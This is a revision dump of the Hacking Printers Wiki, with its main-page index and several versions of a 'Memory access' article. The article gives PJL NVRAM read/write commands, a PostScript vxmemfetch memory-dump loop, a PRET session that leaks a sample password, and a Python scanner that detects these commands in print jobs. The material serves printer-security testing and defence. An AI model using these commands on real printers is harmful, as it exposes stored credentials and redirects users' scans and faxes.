style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentals</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td 
style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Coming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ d79b6a1fd4889be34850f7bb2c070683a9802a7f 61 29 2017-01-07T18:48:34Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. 
</div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" 
style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentals</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td 
style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Hacking [[Beyond Printers|PostScript processing websites]]</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 3ff3c337954e3bb5699729009acec3123c2a89ec 29 26 2016-12-31T11:11:24Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. 
</div> </div> 56ab6984fb3bae8608eb6d3ce7ae8411aa468079 11 9 2016-11-23T13:33:04Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; 
border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | Check out the [[Printer Security Testing Cheat Sheet]] |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[For network administrators]] * [[For printer manufacturers]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Some literature]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" 
style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | * [[Links|Further reading]] |} |} Beyond Printers --------------- + Hacking PostScript Processors / websites Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] __NOTOC__ c97c3c132fbed2e2c581a46424006c9e33ca7fd3 9 2 2016-11-22T10:53:26Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Printer Hacking Wiki''', an open approach to share knowledge on printer (in)security. 
</div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | Check out the [[Printer Security Testing Cheat Sheet]] |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; 
font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Network Protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] * '''[[Printer Languages]] ** [[PJL]], [[PCL]], [[PostScript]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Dedicated Print Server]] * [[Table 8.1]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | ... |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Links</h2> |- | ... http://www.undocprint.org/ |} |} Beyond Printers --------------- + PostScript Processors / websites Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. 
== Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] __NOTOC__ 52c716d69ed640c5fd722c404846518a9cfe0dfd 2 1 2016-11-22T09:10:28Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> This is the '''Printer Hacking Wiki''', an open approach to share knowledge on printer (in)security. </div> <strong>MediaWiki has been successfully installed.</strong> Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] 26e52855c5246add9dd357c29b1af265e5288128 1 2016-11-21T10:24:24Z MediaWiki default 0 wikitext text/x-wiki <strong>MediaWiki has been successfully installed.</strong> Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. 
Memory access 0 41 324 180 2017-01-31T10:34:21Z 84.153.135.135 0 wikitext text/x-wiki

If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.

== PJL (Brother) ==

For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed in <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows one to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer which can be incremented to dump the whole NVRAM.

<syntaxhighlight lang=sh>
@PJL RNVRAM ADDRESS = X            # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y   # write byte Y to location X
</syntaxhighlight>

This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server, or she can exchange fax numbers in the address book so that faxes are sent to the attacker's fax number instead.

'''How to test for this attack?'''

The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]], can be tested as follows:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> nvram dump
 Writing copy to nvram/printer
 ................................................................................
 ................................................................................
 ............................................MyS3cretPassw0rd....................
 ................................................................................

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PostScript (Xerox) ==

Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built in, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can easily be used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as shown below:

<syntaxhighlight lang=postscript>
/counter 0 def
50000 {
  /counter counter 1 add def
  currentdict /RRCustomProcs /ProcSet findresource begin begin
  counter 1 false vxmemfetch
  end end
  == counter
} repeat
</syntaxhighlight>

'''How to test for this attack?'''

Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above.

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----
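Both sections above describe memory access that arrives inside an ordinary print job, so a print server or spool monitor is the natural place to catch it. The following is an added example, not code from this wiki, from PRET or from any vendor: a Python scanner that inspects one raw job (as captured on port 9100/tcp or read from a spool file) for the Brother PJL <code>RNVRAM</code>/<code>WNVRAM</code> commands and the Xerox <code>vxmemfetch</code> operator, and additionally flags a job that touches many distinct NVRAM addresses as the "increment X" dump pattern. The sample jobs, the <code>SWEEP_THRESHOLD</code> value and the <code>Finding</code> kinds are constructed assumptions.

```python
"""Scan raw print jobs for printer-memory access commands.

Added example, not part of the Hacking Printers wiki, PRET or any vendor
firmware. It flags the Brother PJL RNVRAM/WNVRAM commands and the Xerox
PostScript vxmemfetch operator in a job as captured on port 9100/tcp or
read from a print server spool. Sample jobs and the sweep threshold below
are constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Brother-specific PJL NVRAM commands: "@PJL RNVRAM ADDRESS = X" reads a byte,
# "@PJL WNVRAM ADDRESS = X DATA = Y" writes one. Matched anywhere in the
# byte stream, so surrounding UEL sequences or other PJL lines do not matter.
PJL_NVRAM_RE = re.compile(
    rb"@PJL\s+(?P<cmd>[RW]NVRAM)\s+ADDRESS\s*=\s*(?P<addr>\d+)"
    rb"(?:\s+DATA\s*=\s*(?P<data>\S+))?",
    re.IGNORECASE,
)

# Xerox-proprietary PostScript operator; guarded by "not a name character"
# on both sides so that an unrelated longer name does not match.
PS_MEMFETCH_RE = re.compile(rb"(?<![A-Za-z0-9_])vxmemfetch(?![A-Za-z0-9_])")

# Assumed threshold: this many distinct NVRAM addresses in one job is treated
# as a sweep, i.e. the "increment X to dump the whole NVRAM" pattern.
SWEEP_THRESHOLD = 16


@dataclass
class Finding:
    kind: str        # nvram_read | nvram_write | nvram_sweep | ps_memfetch
    detail: str
    addresses: List[int] = field(default_factory=list)


def scan_job(job: bytes) -> List[Finding]:
    """Return the findings for one raw print job; an empty list means clean."""
    findings: List[Finding] = []
    reads: List[int] = []
    writes: List[int] = []
    for m in PJL_NVRAM_RE.finditer(job):
        addr = int(m.group("addr"))
        (reads if m.group("cmd").upper() == b"RNVRAM" else writes).append(addr)

    if reads:
        findings.append(Finding("nvram_read", f"{len(reads)} RNVRAM command(s)",
                                sorted(set(reads))))
    if writes:
        findings.append(Finding("nvram_write", f"{len(writes)} WNVRAM command(s)",
                                sorted(set(writes))))

    touched = set(reads) | set(writes)
    if len(touched) >= SWEEP_THRESHOLD:
        findings.append(Finding(
            "nvram_sweep",
            f"{len(touched)} distinct NVRAM addresses ({min(touched)}..{max(touched)})",
            sorted(touched)))

    hits = len(PS_MEMFETCH_RE.findall(job))
    if hits:
        findings.append(Finding("ps_memfetch", f"vxmemfetch used {hits} time(s)"))
    return findings


def is_suspicious(job: bytes) -> bool:
    """True if the job contains any memory/NVRAM access command."""
    return bool(scan_job(job))


# --- constructed sample jobs (not real captures) -------------------------
UEL = b"\x1b%-12345X"   # PJL universal exit language sequence

# Ordinary job: PJL header, then a PostScript page.
BENIGN_JOB = (UEL + b'@PJL JOB NAME="quarterly report"\r\n'
              b"@PJL SET COPIES=1\r\n"
              b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
              b"%!PS\n/Helvetica findfont 12 scalefont setfont\n"
              b"72 720 moveto (Hello) show showpage\n" + UEL)

# The page's X loop rendered as one job: read NVRAM addresses 0..63.
NVRAM_DUMP_JOB = UEL + b"".join(
    b"@PJL RNVRAM ADDRESS = %d\r\n" % x for x in range(64)) + UEL

# Two NVRAM byte writes, e.g. tampering with stored settings.
NVRAM_WRITE_JOB = (UEL + b"@PJL WNVRAM ADDRESS = 42 DATA = 255\r\n"
                   b"@PJL WNVRAM ADDRESS = 43 DATA = 0\r\n" + UEL)

# Constructed PostScript fragment invoking the Xerox memory-read operator.
XEROX_JOB = b"%!PS\n/counter 0 def\ncounter 1 false vxmemfetch ==\n"

if __name__ == "__main__":
    for name, job in [("benign", BENIGN_JOB), ("nvram_dump", NVRAM_DUMP_JOB),
                      ("nvram_write", NVRAM_WRITE_JOB), ("xerox", XEROX_JOB)]:
        print(name, [(f.kind, f.detail) for f in scan_job(job)] or "clean")
```

Run it against each spooled job before it is forwarded to the device; any finding is worth an alert, since neither command has a legitimate use in a document sent by an end user, and a single job with a <code>nvram_sweep</code> finding is the fingerprint of a whole-NVRAM dump. The regexes deliberately match anywhere in the byte stream rather than parsing the job line by line, so splitting commands across UEL sequences or mixing them into a PCL or PostScript body does not hide them.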
<syntaxhighlight lang=sh> @PJL RNVRAM ADDRESS = X # read byte at location X @PJL WNVRAM ADDRESS = X DATA = Y # write byte Y to location X </syntaxhighlight> This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. 
Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- c0adc148e63c76b5b19d7dc483f28b77d33b978c 172 171 2017-01-21T11:38:22Z Admin 1 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. 
@PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site 